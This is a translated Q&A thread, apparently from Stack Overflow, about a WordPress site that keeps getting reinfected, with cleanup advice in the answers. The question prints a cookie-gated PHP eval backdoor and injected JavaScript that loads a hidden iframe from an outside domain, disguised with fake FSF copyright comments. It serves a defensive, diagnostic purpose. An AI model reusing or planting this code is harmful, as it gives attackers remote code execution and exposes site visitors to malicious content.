1. 首頁
  2. 問答
  3. Wordpress惡意軟件一次又一次

Wordpress惡意軟件一次又一次

2014-09-26 171 views
0

由於注入了一些js代碼的惡意軟件,幾天後,我的一個WordPress網站在google警報下重定向。 (http://freakymonster.beWordpress惡意軟件一次又一次

我跑了好幾個惡意軟件檢測,但所有我能找到的是:

  • 一些PHP文件與此代碼中:

if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and [email protected](@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;
  • 一些JS代碼注入我的js文件中,像這樣

/* 
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ 
*/ 
function Vuelingflytersku() { 
function setCookie(name, value, expires) { 
var date = new Date(new Date().getTime() + expires*1000); 
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); 
} 
function Ursilifer(name) { 
var matches = document.cookie.match(new RegExp("(?:^|;)" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)")); 
return matches ? decodeURIComponent(matches[1]) : undefined; 
} 
var cookie = Ursilifer('karater7una8ue'); 
if (cookie == undefined) { 
    setCookie('karater7una8ue', true, 259201); 
document.write('<iframe src="http://miriolda.onlyradiogreen.com.ar/aflorigunam16.khml"  style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe>'); 
} 
} 
Vuelingflytersku(); 
/* 
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt

我完全重新安裝的WordPress和插件,重新設置管理員密碼,但無論如何,它回來。我真的不知道該怎麼辦

因此,如果有人可以給一些建議,這將是巨大

來源

2014-09-26 Agatha Power

+0

這個問題似乎是無關緊要的,因爲它不是編程相關的,也許適合http://security.stackexchange.com/help/on-topic – bummi 2014-12-17 23:41:35

回答

0

下載iTheme安全插件。有一個免費的惡意軟件保護功能。它是一個很棒的插件。

此外,檢查頁腳文件的任何有一個「php編碼」行或您沒有添加的內聯框架。

來源

2014-09-27 06:33:05

+0

好吧,我會試試,非常感謝 – 2014-09-27 10:17:32

+0

iTheme安全看起來確實很棒! – 2014-09-27 15:32:52

0

修復或假定其安全性不再安全,直到找到什麼是環形孔爲止。請按照下列步驟將其最小化。

  1. 在php.ini中禁用eval函數或聯繫支持人員爲您做。
  2. 更新wordpress,主題和插件。
  3. 卸載未使用的主題和插件。
  4. 更改默認管理員用戶名和密碼。 (您可以直接更改數據庫中的用戶名。)
  5. 如果有任何備份,請恢復任何安全備份。並執行以上所有步驟。

來源

2014-09-27 06:40:01

0

因此,這裏是我做了什麼:

  • 後盾主題和數據庫
  • 更改管理員密碼(也沒必要改變「管理」到另一個用戶名,因爲它已經是一個又一個)
  • 刪除一切(除了數據庫,因爲我沒有找到轉儲任何錯誤)
  • 更改FTP密碼
  • 重新安裝一個乾淨的WordPress
  • 安裝Sucuri和GOTMLS
  • 安裝iTheme安全的反惡意軟件(這個人是偉大的),並按照說明
  • 重新安裝的主題,則2〜3小時後分析
  • 重新安裝乾淨的插件,一個接一個每隔2或3小時,在每個區間結束時進行分析

似乎現在乾淨了。

來源

2014-09-28 17:21:01

0

我在過去的幾個星期裏有過這樣的事情,這是一場噩夢。 該惡意軟件被稱爲actermoto或homemader,它會一次又一次地感染所有js文件。

有沒有點修復您的JavaScript文件,因爲他們將在幾分鐘內重新感染。

後門程序是系統中某處的php文件。 它看起來有點像這樣...

if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['

你需要做你的服務器上的grep來找到這個文件(S)

一旦你找到了後門文件,將它們全部刪除,並繼續監視和更改爲js文件。

這是一場消耗戰,但要堅持下去,最終你會得到它們。

來源

2014-10-11 23:04:20 Dave

相關問題

 相關問題